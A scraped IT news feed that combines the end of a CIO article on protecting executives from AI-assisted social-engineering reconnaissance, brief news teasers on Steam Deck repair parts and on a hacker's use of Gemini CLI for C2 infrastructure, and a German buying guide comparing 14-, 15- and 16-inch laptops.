<p class="wp-block-paragraph">Work with each executive to identify content that expands their AI-indexed profile without serving any legitimate business purpose. This includes legacy conference bios that contain personal details, social posts that reveal schedule patterns or family context and board announcements that, in aggregate, map an executive’s full professional network. For some of this content, removal is possible and worth pursuing with a targeted effort.</p>



<p class="wp-block-paragraph">The more important conversation is around future behavior. Executives who habitually overshare on LinkedIn or in conference panels need to understand, concretely, what that sharing enables.</p>



<p class="wp-block-paragraph">Family member exposure is a consistent blind spot. An attacker who cannot pressure an executive directly may look for leverage through a spouse, a sibling or a child. Executives rarely consider their family members’ public digital footprint as part of their own security posture. It is.</p>



<h3 class="wp-block-heading">Shape the narrative where reduction isn’t possible</h3>



<p class="wp-block-paragraph">Public company executives, board members with mandatory disclosure obligations and individuals whose public profiles are central to their organizations’ credibility cannot simply go dark.</p>



<p class="wp-block-paragraph">The objective shifts from reduction to shaping in these cases. The goal is to ensure that what AI tools synthesize from the indexed content is professionally bound and does not inadvertently surface high-value pretext material. This is a joint exercise between security and communications, with security defining risk boundaries and communications executing the strategy.</p>



<h3 class="wp-block-heading">Train executives on what their own profile looks like</h3>



<p class="wp-block-paragraph">The most effective single intervention I have seen in executive briefings is also the simplest. Open a browser and query an AI platform on the executive in the room. Let them see the output. The reaction is consistent. They are surprised by the synthesis, uncomfortable with specific details that surface and immediately more engaged with the rest of the conversation than they were before.</p>



<p class="wp-block-paragraph">Abstract threat briefings about social engineering risks rarely land with senior leaders who feel they understand their own security position. Demonstrated evidence of their AI-mediated profile lands every time. As covered in the context of <a href="https://www.cio.com/article/4076479/from-awareness-to-ai-driven-resilience-protecting-identities-data-and-agents.html">executive-targeted attacks</a>, awareness is a prerequisite for the behavior change that makes protection programs effective.</p>



<h3 class="wp-block-heading">Integrate this into the executive protection program</h3>



<p class="wp-block-paragraph">This work belongs alongside endpoint security, credential management and physical protection in a unified executive protection program. When it remains a communications function, it lacks the reporting structure, budget authority and operational discipline that security work requires.</p>



<p class="wp-block-paragraph">Assign an owner with a security mandate. Include AI exposure in the risk register. Report on it at the same cadence as other executive protection metrics. The organizations that have done this well have not created a separate program for it. They have extended an existing one.</p>



<h2 class="wp-block-heading"><a></a>What effective executive protection programs now include</h2>



<p class="wp-block-paragraph">The organizations that have integrated AI exposure into their executive protection work share a few characteristics that distinguish them from those still treating it as a communications edge case.</p>



<ul class="wp-block-list">
<li>They treat the executive’s public information footprint as a managed attack surface with a named accountable party. Someone is responsible for it, the same way someone is responsible for endpoint patching or identity governance.</li>



<li>They include AI-assisted reconnaissance as a starting condition in red team exercises. Before any social engineering simulation begins, the red team runs the same queries an attacker would run. The pretext they design is based on what those queries return.</li>



<li>Their executive protection briefings include an AI profile review as a standing agenda point. Physical security considerations, credential exposure and public information risk are reviewed together because they are connected. An attacker who knows an executive’s schedule from their public-facing content can time a credential reset attempt or a vishing call with equal precision.</li>
</ul>



<p class="wp-block-paragraph">The executive I reviewed several years ago had no idea what his AI-indexed profile contained or what it enabled. Most of the executives I work with today are in the same position. By the time you finish reading this, it is likely those queries have already been run on someone in your organization. The question is whether your program is positioned to detect it and respond in time.</p>



<p class="wp-block-paragraph"><strong>This article is published as part of the Foundry Expert Contributor Network.</strong><br><a href="https://www.cio.com/expert-contributor-network/"><strong>Want to join?</strong></a></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Valve appears to be discontinuing self-repair parts for the LCD Steam Deck at iFixit]]></title>
<description><![CDATA[An iFixit staffer told a Steam Deck user that the company had no plans to stock replacement OEM batteries.]]></description>
<link>https://tsecurity.de/de/3671340/it-nachrichten/valve-appears-to-be-discontinuing-self-repair-parts-for-the-lcd-steam-deck-at-ifixit/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3671340/it-nachrichten/valve-appears-to-be-discontinuing-self-repair-parts-for-the-lcd-steam-deck-at-ifixit/</guid>
<pubDate>Wed, 15 Jul 2026 18:33:52 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[An iFixit staffer told a Steam Deck user that the company had no plans to stock replacement OEM batteries.]]></content:encoded>
</item>
<item>
<title><![CDATA[Russian-Speaking Hacker Uses Gemini CLI to Deploy C2 Botnet in Six Minutes]]></title>
<description><![CDATA[A Russian-speaking threat actor tracked as “bandcampro” used Google Gemini CLI as an end-to-end operational assistant to migrate a command-and-control server, deploy a replacement VPS, configure Cloudflare tunnels, and restore control of compromised endpoints within six minutes. The findings are…...]]></description>
<link>https://tsecurity.de/de/3671042/it-security-nachrichten/russian-speaking-hacker-uses-gemini-cli-to-deploy-c2-botnet-in-six-minutes/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3671042/it-security-nachrichten/russian-speaking-hacker-uses-gemini-cli-to-deploy-c2-botnet-in-six-minutes/</guid>
<pubDate>Wed, 15 Jul 2026 16:55:40 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>A Russian-speaking threat actor tracked as “bandcampro” used Google Gemini CLI as an end-to-end operational assistant to migrate a command-and-control server, deploy a replacement VPS, configure Cloudflare tunnels, and restore control of compromised endpoints within six minutes. The findings are…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/russian-speaking-hacker-uses-gemini-cli-to-deploy-c2-botnet-in-six-minutes/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/russian-speaking-hacker-uses-gemini-cli-to-deploy-c2-botnet-in-six-minutes/">Russian-Speaking Hacker Uses Gemini CLI to Deploy C2 Botnet in Six Minutes</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[14, 15 oder 16 Zoll Laptop – welche Größe passt zu welchem Nutzerprofil?]]></title>
<description><![CDATA[Ein neuer Laptop ist eine Investition für die nächsten Jahre. Doch bevor man sich in Datenblättern zu Prozessoren, RAM und Grafikkarten verliert, steht die wichtigste und buchstäblich größte Entscheidung an: das Gehäuseformat. Schließlich bestimmt die Bildschirmdiagonale nicht nur, wie viel Arbei...]]></description>
<link>https://tsecurity.de/de/3670835/windows-tipps/14-15-oder-16-zoll-laptop-welche-groesse-passt-zu-welchem-nutzerprofil/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3670835/windows-tipps/14-15-oder-16-zoll-laptop-welche-groesse-passt-zu-welchem-nutzerprofil/</guid>
<pubDate>Wed, 15 Jul 2026 15:42:33 +0200</pubDate>
<category>🪟 Windows Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Ein <a href="https://www.pcwelt.de/article/2215385/die-besten-laptops-test.html" target="_blank" rel="noreferrer noopener">neuer Laptop</a> ist eine Investition für die nächsten Jahre. Doch bevor man sich in Datenblättern zu Prozessoren, RAM und Grafikkarten verliert, steht die wichtigste und buchstäblich größte Entscheidung an: das Gehäuseformat. Schließlich bestimmt die Bildschirmdiagonale nicht nur, wie viel Arbeitsfläche Ihnen zur Verfügung steht – sie diktiert auch das Gewicht, die Akkugröße und die Kühlleistung Ihres neuen Systems.</p>



<p>Während vor wenigen Jahren noch der 15,6-Zöller als unangefochtener Standard galt, hat sich der Markt inzwischen gewandelt. Die Ränder um die Displays sind geschrumpft, moderne 16:10-Bildformate erobern die Schreibtische und stellen Käufer vor eine technologische Grundsatzfrage.</p>



<p>Die Eier legende Wollmilchsau gibt es nämlich auch hier nicht: Wer stundenlang <a href="https://www.pcwelt.de/article/2517080/die-besten-laptops-fuer-die-video-bearbeitung.html" target="_blank" rel="noreferrer noopener">Videos schneidet</a> oder Excel-Tabellen wälzt, flucht über einen zu kleinen Bildschirm. Wer sein Gerät hingegen täglich in der Bahn zum Pendeln nutzt, ärgert sich schnell über jedes Gramm zu viel im Rucksack. </p>



<p>Damit Sie beim Kauf nicht zum falschen Formfaktor greifen, dröseln wir die Stärken und Schwächen der drei wichtigsten Laptop-Größen auf und geben eine Kaufberatung für die unterschiedlichen Nutzerprofile.</p>



<h2 class="wp-block-heading">Die drei Display-Größen im Alltags-Check</h2>



<p>Um das Maximum aus Ihrem Budget herauszuholen, sollten Sie die Charakteristiken der Formfaktoren kennen. Jede Größe hat ein optimales Einsatzgebiet.</p>



<h2 class="wp-block-heading">1. 14-Zoll-Laptops: Mobile Begleiter für Pendler</h2>



<p>Der 14-Zöller (ca. 35,5 cm Diagonale) ist das gängige Format für alle, die häufig unterwegs sind. Moderne Fertigungstechniken erlauben ein Gerätegewicht von oft kaum mehr als einem Kilogramm, zudem sind die Geräte so dünn, dass sie problemlos in jede Aktentasche oder den Uni-Rucksack passen. </p>



<p>Durch das kompakte Gehäuse ist der Akkuverbrauch des Displays geringer, was oft zu ausgezeichneten Laufzeiten führt. Das Manko: Die kompakte Bauweise lässt wenig Platz für wuchtige Kühlsysteme oder dedizierte Grafikkarten. Zudem erfordert längeres Multitasking mit mehreren geöffneten Fenstern auf dem kleineren Bildschirm oft gute Augen oder cleveres Fenster-Management.</p>



<h3 class="wp-block-heading">Für wen eignen sich 14-Zoll-Laptops?</h3>



<p>Das Format ist besonders geeignet für Pendler, Studenten, Geschäftsreisende und alle, die ihren Laptop täglich transportieren. Wer primär textbasiert arbeitet, surft, streamt oder an Videocalls teilnimmt, wird die Leichtigkeit dieser Geräteklasse lieben.</p>



<h2 class="wp-block-heading">Produktempfehlung: ASUS Zenbook 14 OLED</h2>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a578e3834be4"}' data-wp-interactive="core/image" class="wp-block-image size-large is-resized wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2026/06/ASUS-Zenbook-14-OLED-Laptop-bild2.jpg?quality=50&amp;strip=all&amp;w=1200" alt="ASUS Zenbook 14 OLED Laptop Bild 2" class="wp-image-3169558" width="1200" height="822" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button></figure><p class="imageCredit">Asus</p></div>


<span class="cta_btn_heading cta_btn_heading_"></span><div class="cta wp-block wp-block-button cta__btn_"><a class="cta__btn shopping-cart-icon-white link-6-button" href="https://www.amazon.de/dp/B0DX2LSGSR?tag=pcwelt.de-21&amp;ascsubtag=4-0-3169538-7-0-0-0-0&amp;ascsubtag=rss" target="_blank" rel="nofollow" data-vars-link-position="CTA Button" data-domain-name="amazon" data-subtag="4-0-3169538-7-0-0-0-0">Asus Zenbook 14 OLED bei Amazon ansehen</a></div>


<p>Preis: 1.149 Euro</p>



<p><strong>Technik-Specs:</strong></p>



<ul class="wp-block-list">
<li><strong>Bilddiagonale &amp; Format:</strong> 14 Zoll (35,6 cm), Seitenverhältnis 16:10, NanoEdge-Design (schmale Ränder)</li>



<li><strong>Auflösung &amp; Panel-Typ:</strong> 2,8 K (2.880 × 1.800 Pixel), Lumina-OLED-Panel</li>



<li><strong>Farbraum &amp; Helligkeit:</strong> 100 % DCI-P3-Abdeckung, maximale Spitzenhelligkeit 550 Nits</li>



<li><strong>Bildwiederholrate &amp; Reaktionszeit:</strong> 120 Hz, 0,2 ms (Herstellerangabe)</li>



<li><strong>Gewicht &amp; Maße:</strong> 1,2 kg, 14,9 mm Bauhöhe</li>



<li><strong>Prozessor &amp; Grafik:</strong> AMD Ryzen AI 7 350 (inklusive dedizierter NPU für KI-Berechnungen), integrierte AMD Radeon Grafikeinheit</li>



<li><strong>Speicher:</strong> 16 GB LPDDR5X RAM, 1 TB PCIe Gen4 x4 SSD</li>



<li><strong>Akkukapazität:</strong> 75 Wh (laut Hersteller ausgelegt auf hohe Langlebigkeit mit 70 % Restkapazität nach 1200 Ladezyklen)</li>



<li><strong>Audio &amp; Extras:</strong> Soundsystem von Harman Kardon mit Dolby Atmos und KI-Geräuschunterdrückung, beleuchtete Tastatur (QWERTZ-Layout)</li>



<li><strong>Betriebssystem:</strong> Windows 11 Home (Copilot+ PC zertifiziert)</li>
</ul>



<p>Das <a href="https://www.amazon.de/dp/B0DX2LSGSR?tag=pcwelt.de-21&amp;ascsubtag=rss" target="_blank" rel="noreferrer noopener">Asus Zenbook 14 OLED</a> demonstriert anschaulich, warum 14-Zöller aktuell so beliebt sind. Trotz des geringen Gewichts von nur 1,2 Kilogramm bietet das Notebook mit seinem AMD Ryzen AI 7 350 Prozessor und 16 GB Arbeitsspeicher genügend Leistungsreserven für Office-Anwendungen, Multitasking und leichte Bildbearbeitung. Das hochauflösende 2,8K-OLED-Display mit 120 Hz sorgt dabei für eine scharfe Darstellung, kräftige Farben und flüssige Bildabläufe.</p>



<p>Ein praktisches Detail für den mobilen Alltag ist dabei auch das kompakte Gehäuse mit nur 14,9 Millimetern Bauhöhe. Gleichzeitig verbaut Asus einen großzügigen 75-Wh-Akku, der laut Hersteller Laufzeiten von bis zu 18 Stunden ermöglichen soll. Die Ausstattung wird speziell für Videokonferenzen und Multimedia-Anwendungen durch Dolby-Atmos-Lautsprecher von Harman Kardon sowie eine integrierte KI-Geräuschunterdrückung abgerundet.</p>



<h2 class="wp-block-heading">2. 15-Zoll-Laptops: Preisbewusste Allrounder</h2>



<p>Das 15-Zoll-Segment gilt bis heute als der klassische Mittelweg zwischen Mobilität und Arbeitsfläche. Je nach Hersteller kommen im 15-Zoll-Bereich sowohl klassische 16:9- als auch moderne 16:10-Displays zum Einsatz.</p>



<p>Das 16:9-Format eignet sich besonders gut für den Medienkonsum, etwa für Filme und Serien, ohne störende schwarze Balken. Das 16:10-Format bietet dagegen mehr vertikale Bildschirmfläche – ein Vorteil beim Arbeiten mit Dokumenten, Tabellen oder längeren Webseiten.</p>



<p>Weil die Gehäuse oft auf bewährten, kostengünstigen Chassis-Designs der Hersteller basieren, bekommt man in dieser Klasse in der Regel das meiste Datenblatt für sein Geld. Zudem bieten 15-Zöller fast immer einen vollwertigen, physischen Nummernblock auf der rechten Seite der Tastatur.</p>



<h3 class="wp-block-heading">Für wen eignen sich 15-Zoll-Laptops?</h3>



<p>Der klassische 15-Zöller richtet sich an preisbewusste Käufer, Homeoffice-Nutzer, die keinen externen Monitor besitzen, und Nutzer, die ihr Notebook meistens in der Wohnung einsetzen oder das Gerät nur gelegentlich mit auf Reisen nehmen.</p>



<h2 class="wp-block-heading">Produktempfehlung: Lenovo IdeaPad Slim 3 (15″)</h2>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a578e3835916"}' data-wp-interactive="core/image" class="wp-block-image size-large is-resized wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2026/06/Lenovo-IdeaPad-Slim-3-Laptop-15.6.jpg?quality=50&amp;strip=all&amp;w=1200" alt="Lenovo IdeaPad Slim 3 Laptop 15.6" class="wp-image-3169563" width="1200" height="997" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button></figure><p class="imageCredit">Lenovo </p></div>


<span class="cta_btn_heading cta_btn_heading_"></span><div class="cta wp-block wp-block-button cta__btn_"><a class="cta__btn shopping-cart-icon-white link-6-button" href="https://www.amazon.de/dp/B0DSGB8C6M?tag=pcwelt.de-21&amp;ascsubtag=4-0-3169538-7-0-0-0-0&amp;ascsubtag=rss" target="_blank" rel="nofollow" data-vars-link-position="CTA Button" data-domain-name="amazon" data-subtag="4-0-3169538-7-0-0-0-0">Lenovo IdeaPad Slim 3 bei Amazon ansehen</a></div>


<p>Preis: ca. 682 Euro</p>



<p><strong>Technik-Specs:</strong></p>



<ul class="wp-block-list">
<li><strong>Bilddiagonale &amp; Format:</strong> 15,6 Zoll (39,6 cm), Seitenverhältnis 16:10</li>



<li><strong>Auflösung &amp; Panel-Typ:</strong> WUXGA (1920 × 1200 Pixel), LC-Display</li>



<li><strong>Gewicht &amp; Maße:</strong> ca. 1,6 kg, 17,9 mm Bauhöhe</li>



<li><strong>Prozessor &amp; Grafik:</strong> Intel Core i5-13420H, Intel UHD Grafik</li>



<li><strong>Speicher:</strong> 16 GB DDR5-RAM, 512 GB SSD</li>



<li><strong>Akkukapazität:</strong> 42 Wh</li>



<li><strong>Tastatur:</strong> QWERTZ-Layout mit integriertem Nummernblock</li>



<li><strong>Software &amp; Extras:</strong> Smart Connect, 3 Monate Lenovo Premium Care, 24 Monate Herstellergarantie</li>



<li><strong>Anschlüsse &amp; Konnektivität:</strong> 2 USB-Anschlüsse, HDMI, WLAN, Bluetooth</li>



<li><strong>Betriebssystem:</strong> Windows 11 Home</li>
</ul>



<p>Das <a href="https://www.amazon.de/dp/B0DSGB8C6M?tag=pcwelt.de-21&amp;ascsubtag=rss" target="_blank" rel="noreferrer noopener">Lenovo IdeaPad Slim 3</a> (Modell: 15IRH10) richtet sich an Nutzer, die ein solides Notebook für Alltag, Studium und Homeoffice suchen. Mit seinem 15,6 Zoll großen WUXGA-Display im modernen 16:10-Format bietet es etwas mehr vertikale Arbeitsfläche als klassische 16:9-Modelle – ein Vorteil beim Arbeiten mit Dokumenten, Tabellen oder längeren Webseiten. Trotz der großzügigen Bildschirmfläche bleibt das Gerät mit rund 1,6 Kilogramm angenehm mobil.</p>



<p>Für die Rechenleistung sorgt ein Intel Core i5-13420H Prozessor, der zusammen mit 16 GB DDR5-Arbeitsspeicher genügend Reserven für Office-Anwendungen, Multitasking und alltägliche Multimedia-Aufgaben bietet. Anspruchsvolle Spiele oder grafikintensive Anwendungen sind hingegen nicht die Stärke dieses Modells, da ausschließlich die integrierte Intel-UHD-Grafik zum Einsatz kommt.</p>



<p>Praktisch im Alltag ist die Smart-Connect-Funktion von Lenovo, mit der sich kompatible Smartphones, Tablets und PCs einfacher miteinander verbinden und Daten austauschen lassen. Damit positioniert sich das IdeaPad Slim 3 klar als klassischer Allrounder für produktives Arbeiten zu Hause, im Büro oder im Studium.</p>



<h2 class="wp-block-heading">3. 16-Zoll-Laptops: Mobile Kraftpakete</h2>



<p>Der 16-Zöller (ca. 40,6 cm Diagonale) ist der moderne Nachfolger der alten, klobigen 15,6- und 17-Zoll-Workstations. Dank besonders schmaler Displayränder passen 16-Zoll-Bildschirme heute in Gehäuse, die früher für 15 Zoll reserviert waren. Fast alle Geräte in dieser Klasse setzen auf das höhere 16:10-Format, was beim Arbeiten spürbar mehr vertikale Bildschirmfläche (z. B. für Code-Zeilen oder Webseiten) bietet.</p>



<p>Der entscheidende Vorteil dieser Größe: Das große Gehäuse bietet reichlich Platz für leistungsstarke Kühlsysteme und große Akkus (bis zum gesetzlichen <a href="https://www.pcwelt.de/article/2946084/powerbank-im-flugzeug-was-ist-erlaubt.html" target="_blank" rel="noreferrer noopener">Flugzeug-Limit</a> von 99 Wattstunden). Hier finden leistungsstarke Prozessoren und dedizierte Grafikkarten deutlich bessere Kühlbedingungen als in kompakteren Gehäusen.</p>



<h3 class="wp-block-heading">Für wen eignet sich die 16-Zoll-Größe?</h3>



<p>Für Power-User, Content Creator (Foto/Video), ambitionierte Gamer und Nutzer, die den Laptop als vollwertigen Desktop-Ersatz (Desktop Replacement) nutzen möchten.</p>



<h2 class="wp-block-heading">HP Omen MAX Gaming Laptop (16″)</h2>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a578e3836631"}' data-wp-interactive="core/image" class="wp-block-image size-large is-resized wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2026/06/Omen-MAX-Gaming-Laptop-16-Zoll-WQXGA-Display-240Hz.jpg?quality=50&amp;strip=all&amp;w=1200" alt="Omen MAX Gaming Laptop, 16 Zoll WQXGA Display 240Hz," class="wp-image-3169567" width="1200" height="1124" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button></figure><p class="imageCredit">HP</p></div>


<span class="cta_btn_heading cta_btn_heading_"></span><div class="cta wp-block wp-block-button cta__btn_"><a class="cta__btn shopping-cart-icon-white link-6-button" href="https://www.amazon.de/dp/B0DYL4GQ19?tag=pcwelt.de-21&amp;ascsubtag=4-0-3169538-7-0-0-0-0&amp;ascsubtag=rss" target="_blank" rel="nofollow" data-vars-link-position="CTA Button" data-domain-name="amazon" data-subtag="4-0-3169538-7-0-0-0-0">HP Omen MAX Gaming Laptop bei Amazon ansehen</a></div>


<p>Preis: 2.199 Euro</p>



<p><strong>Technik-Specs:</strong></p>



<ul class="wp-block-list">
<li><strong>Bilddiagonale &amp; Format:</strong> 16 Zoll (40,6 cm), Seitenverhältnis 16:10</li>



<li><strong>Auflösung &amp; Panel-Typ:</strong> WQXGA (2560 × 1600 Pixel), IPS-Display</li>



<li><strong>Bildwiederholrate:</strong> 240 Hz</li>



<li><strong>Gewicht &amp; Maße:</strong> ca. 2,71 kg, 2,5 cm Bauhöhe</li>



<li><strong>Prozessor &amp; Grafik:</strong> AMD Ryzen AI 7 350 (bis zu 5,0 GHz)</li>



<li><strong>Grafik:</strong> integrierte AMD Radeon 860M Grafik und NVIDIA GeForce RTX 5070 Ti (12 GB VRAM)</li>



<li><strong>Speicher:</strong> 32 GB RAM, 1 TB SSD</li>



<li><strong>Akkukapazität:</strong> 83 Wh</li>



<li><strong>Tastatur:</strong> QWERTZ-Layout mit Hintergrundbeleuchtung und Nummernblock</li>



<li><strong>Anschlüsse &amp; Konnektivität:</strong> USB, HDMI, Ethernet, WLAN 7, Bluetooth 5.4</li>



<li><strong>Betriebssystem:</strong> Windows 11 Home</li>
</ul>



<p>Der <a href="https://www.amazon.de/dp/B0DYL4GQ19?tag=pcwelt.de-21&amp;ascsubtag=rss" target="_blank" rel="noreferrer noopener">HP Omen MAX Gaming Laptop</a> positioniert sich als leistungsstarkes 16-Zoll-Notebook für anspruchsvolles Gaming und Content Creation. Das WQXGA-Display (2560 × 1600 Pixel) mit 240 Hz Bildwiederholrate verspricht besonders flüssige Bewegungsdarstellung mit hoher Schärfe, während die IPS-Technologie für stabile Farbdarstellung sorgt.</p>



<p>Im Inneren arbeitet ein AMD Ryzen AI 7 350 Prozessor in Kombination mit einer NVIDIA GeForce RTX 5070 Ti mit 12 GB VRAM. Die Kombination liefert ausreichend Leistung für aktuelle AAA-Spiele, kreative Anwendungen und Multitasking auf hohem Niveau. Ergänzt wird die Ausstattung durch 32 GB Arbeitsspeicher sowie eine 1-TB-SSD für schnelle Ladezeiten und ordentlich Speicherplatz.</p>



<p>Mit einem 83-Wh-Akku und einem Gewicht von rund 2,7 Kilogramm ist das Gerät klar auf Leistung statt maximale Mobilität ausgelegt. Gleichzeitig bietet es eine umfangreiche Anschlussausstattung inklusive Ethernet, HDMI, USB und moderner WLAN-7-Konnektivität. Damit richtet sich dieser Laptop an Nutzer, die ein leistungsstarkes Gaming-Notebook mit Desktop-Anspruch suchen – und den Kaufpreis nicht scheuen.</p>



<h2 class="wp-block-heading">Welche Notebook-Größe passt zu mir?</h2>



<p>Die perfekte Notebook-Größe ist immer ein Kompromiss: Mehr Bildschirm bedeutet automatisch mehr Gewicht und weniger Mobilität. Die folgende Matrix hilft Ihnen dabei, Ihre eigenen Prioritäten zu gewichten und den optimalen Kompromiss für Ihren Alltag zu finden.</p>



<figure class="wp-block-table is-style-stripes"><table class="has-fixed-layout"><tbody><tr><td><strong>Hauptfokus</strong></td><td><strong>Ideale Laptop-Größe</strong></td><td><strong>Der Kompromiss, den Sie dabei eingehen</strong></td></tr><tr><td><strong>Sie sind oft unterwegs (Bahn, Uni, Flieger)</strong></td><td><strong>14 Zoll</strong></td><td>Kleinerer Bildschirm; Multitasking erfordert gutes Fenster-Management.</td></tr><tr><td><strong>Sie arbeiten meistens mit einem externen Monitor</strong></td><td><strong>14 Zoll</strong></td><td>Unterwegs weniger Displayfläche, aber am Schreibtisch maximal flexibel und platzsparend.</td></tr><tr><td><strong>Sie suchen viel Leistung für wenig Geld (Homeoffice)</strong></td><td><strong>15 Zoll</strong></td><td>Oft ältere 16:9-Bildformate; Gehäuse sind meist etwas schwerer und dicker.</td></tr><tr><td><strong>Sie nutzen das Gerät primär auf der Couch oder im Bett</strong></td><td><strong>14 oder 15 Zoll</strong></td><td>16-Zöller sind für den Schoßbetrieb oft zu schwer und werden an den Unterseiten zu warm.</td></tr><tr><td><strong>Sie möchten Ihren Desktop-PC komplett ersetzen</strong></td><td><strong>16 Zoll</strong></td><td>Hohes Gewicht; wuchtiges Netzteil; saugt den Akku unterwegs schneller leer.</td></tr><tr><td><strong>Sie sind auf der Suche nach maximaler Gaming-Power oder Videoschnitt</strong></td><td><strong>16 Zoll</strong> <em>(oder teure 14″ Nische)</em></td><td>Hoher Anschaffungspreis; Lüfter werden unter Last deutlich hörbar.</td></tr></tbody></table></figure>



<h2 class="wp-block-heading">Software-Tipps für Ihren Laptop-Alltag</h2>



<p>Egal, ob Sie sich für das kompakte 14-Zoll-Modell oder den 16-Zoll-Boliden entscheiden – mit diesen drei kostenlosen Software-Tools holen Sie noch mehr aus Ihrem mobilen Arbeitsplatz heraus:</p>



<ul class="wp-block-list">
<li><a href="https://learn.microsoft.com/de-de/windows/powertoys/install?tabs=gh%2Cextract-094" target="_blank" rel="noreferrer noopener"><strong>Microsoft PowerToys (FancyZones)</strong></a><strong>:</strong> Gerade auf den kleineren 14-Zoll-Displays ist das Standard-Fensterlayout von Windows oft fummelig. Mit dem Modul <em>FancyZones</em> unterteilen Sie Ihren Bildschirm in feste, frei definierbare Raster, in die Sie Fenster mit gedrückter Shift-Taste blitzschnell einrasten lassen. Ein absolutes Must-Have für Multitasking auf kleinen Displays.</li>



<li><a href="https://www.spacedesk.net/de/" target="_blank" rel="noreferrer noopener"><strong>SpaceDesk</strong></a><strong>:</strong> Sie sind im Hotel und der 14-Zöller reicht nicht für die Excel-Tabelle aus? SpaceDesk ist eine geniale kostenlose Software, mit der Sie Ihr iPad oder Android-Tablet kabellos über WLAN als vollwertigen, zweiten Windows-Monitor nutzen können. Perfekt für das mobile Büro.</li>



<li><a href="https://www.voidtools.com/downloads/" target="_blank" rel="noreferrer noopener"><strong>Everything</strong></a><strong>:</strong> Laptops werden oft beruflich wie privat vollgepackt mit Dateien. Statt der langsamen Windows-Standard-Suche baut <em>Everything</em> einen superschnellen Index Ihrer Festplatte auf. Dateien, Fotos oder Dokumente werden in Echtzeit gefunden – buchstäblich schon während Sie den Dateinamen tippen.</li>
</ul>



<h2 class="wp-block-heading">Fazit: Welcher Laptop-Typ sind Sie?</h2>



<p>Das perfekte Notebook richtet sich nicht nach dem Geldbeutel, sondern nach dem Einsatzzweck. Wer primär pendelt, in verschiedenen Meetingräumen sitzt oder das Gerät täglich in die Vorlesung schleppt, wird mit einem <strong>14-Zoll-Laptop</strong> am glücklichsten. </p>



